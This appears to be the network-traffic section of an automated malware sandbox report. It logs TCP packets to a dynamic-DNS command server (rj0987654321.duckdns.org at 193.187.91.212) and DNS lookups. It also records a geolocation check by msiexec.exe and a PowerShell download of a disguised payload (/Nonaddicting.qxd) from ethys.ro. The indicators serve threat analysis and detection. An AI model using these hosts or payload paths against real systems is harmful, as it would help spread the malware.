                                                                                                    Oct 23, 2024 17:25:29.178831100 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178883076 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.178891897 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.179059029 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.181200981 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182903051 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182981968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.182991982 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183063984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183140039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183231115 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.183239937 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.184535980 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.184701920 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.185398102 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.310348034 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.315866947 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.693959951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.747625113 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.749301910 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:29.753164053 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753187895 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753242016 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753349066 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753359079 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753367901 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753379107 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753388882 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753468037 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753479958 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753494024 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753503084 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753540039 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.753593922 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754698038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754709005 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754740000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754750967 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754868031 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.754949093 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.925220966 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:29.966327906 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.029232025 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.034811974 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.047544956 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.049827099 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.052081108 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.053040028 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053112984 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053123951 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053134918 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053208113 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053217888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053230047 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053299904 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053311110 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053320885 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053344965 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053354979 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053903103 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.053915024 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.054492950 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.055413961 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.055541039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.055552006 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.055612087 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.055752039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.055835009 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.056281090 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.057477951 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.057585955 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.057851076 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.057888031 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.059959888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.060148001 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.060235977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.060247898 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.060292006 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.061885118 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.062027931 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.423211098 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.486980915 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.488984108 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.492475986 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492578030 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492589951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492657900 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492667913 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492676973 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492690086 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492698908 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492763996 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492774010 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492782116 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492789030 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492984056 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.492993116 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494317055 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494421959 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494535923 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494637966 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494648933 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.494657993 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.732378006 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:30.737675905 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.880997896 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:30.966245890 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.022044897 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.024720907 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.027124882 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.027646065 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027671099 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027753115 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027807951 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027859926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027869940 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027898073 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027908087 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027919054 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027957916 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027967930 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.027971983 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.028062105 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.028073072 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.029783964 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.030333042 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030447960 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030457973 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030467987 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030582905 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030591965 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030615091 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.030723095 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.031793118 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.032696962 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.033798933 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035190105 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035259962 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035386086 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035433054 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035482883 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.035491943 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.037214041 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.037285089 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.037373066 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.037457943 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.256917000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.309797049 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.311878920 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.315294981 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315309048 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315327883 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315337896 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315359116 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315368891 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315377951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315419912 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315431118 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315442085 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315453053 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315481901 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315491915 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.315500975 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317248106 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317301989 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317369938 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317446947 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317509890 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.317559958 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.404119015 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.409606934 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.694040060 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.763115883 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.812773943 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.815066099 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.817307949 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.818217039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818300009 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818310022 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818320036 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818377972 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818417072 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818461895 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818471909 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818591118 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818670988 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818681955 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818764925 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818819046 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.818869114 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.819755077 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.820496082 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820509911 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820609093 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820686102 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820770025 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820780039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.820787907 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.821487904 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:31.822742939 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.822841883 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.822921038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.822968960 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.823107958 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.823117018 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.823127985 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825239897 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825309038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825341940 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825429916 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825438976 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:31.825448990 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 23, 2024 17:22:36.728585005 CEST192.168.2.91.1.1.10x7552Standard query (0)ethys.roA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:16.998564959 CEST192.168.2.91.1.1.10xd738Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:17.997502089 CEST192.168.2.91.1.1.10xd738Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:19.013212919 CEST192.168.2.91.1.1.10xd738Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:21.013242006 CEST192.168.2.91.1.1.10xd738Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:22.330626965 CEST192.168.2.91.1.1.10x7fb8Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:23.341547966 CEST192.168.2.91.1.1.10x7fb8Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:24.341409922 CEST192.168.2.91.1.1.10x7fb8Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:26.344558954 CEST192.168.2.91.1.1.10x7fb8Standard query (0)rj0987654321.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:28.572922945 CEST192.168.2.91.1.1.10x374Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 23, 2024 17:22:29.856857061 CEST1.1.1.1192.168.2.90x2563No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:22:29.856857061 CEST1.1.1.1192.168.2.90x2563No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:22:29.856857061 CEST1.1.1.1192.168.2.90x2563No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:22:36.782126904 CEST1.1.1.1192.168.2.90x7552No error (0)ethys.ro81.180.144.124A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:21.310065985 CEST1.1.1.1192.168.2.90xd738Server failure (2)rj0987654321.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:21.310081005 CEST1.1.1.1192.168.2.90xd738Server failure (2)rj0987654321.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:21.310091019 CEST1.1.1.1192.168.2.90xd738Server failure (2)rj0987654321.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:21.314465046 CEST1.1.1.1192.168.2.90xd738Server failure (2)rj0987654321.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:26.439071894 CEST1.1.1.1192.168.2.90x7fb8No error (0)rj0987654321.duckdns.org193.187.91.212A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:26.439085960 CEST1.1.1.1192.168.2.90x7fb8No error (0)rj0987654321.duckdns.org193.187.91.212A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:26.439100981 CEST1.1.1.1192.168.2.90x7fb8No error (0)rj0987654321.duckdns.org193.187.91.212A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:26.439110994 CEST1.1.1.1192.168.2.90x7fb8No error (0)rj0987654321.duckdns.org193.187.91.212A (IP address)IN (0x0001)false
                                                                                                    Oct 23, 2024 17:23:28.581649065 CEST1.1.1.1192.168.2.90x374No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.949977178.237.33.50807800C:\Windows\SysWOW64\msiexec.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 23, 2024 17:23:28.587980032 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                    Host: geoplugin.net
                                                                                                    Cache-Control: no-cache
                                                                                                    Oct 23, 2024 17:23:29.437005043 CEST1165INHTTP/1.1 200 OK
                                                                                                    date: Wed, 23 Oct 2024 15:23:29 GMT
                                                                                                    server: Apache
                                                                                                    content-length: 957
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    cache-control: public, max-age=300
                                                                                                    access-control-allow-origin: *
                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                    Data Ascii: { "geoplugin_request":"173.254.250.90", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.94973781.180.144.1244437344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-23 15:22:37 UTC168OUTGET /Nonaddicting.qxd HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                    Host: ethys.ro
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-23 15:22:37 UTC413INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    content-type: application/vnd.quark.quarkxpress
                                                                                                    last-modified: Wed, 23 Oct 2024 09:06:27 GMT
                                                                                                    accept-ranges: bytes
                                                                                                    content-length: 467200
                                                                                                    date: Wed, 23 Oct 2024 15:22:37 GMT
                                                                                                    server: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
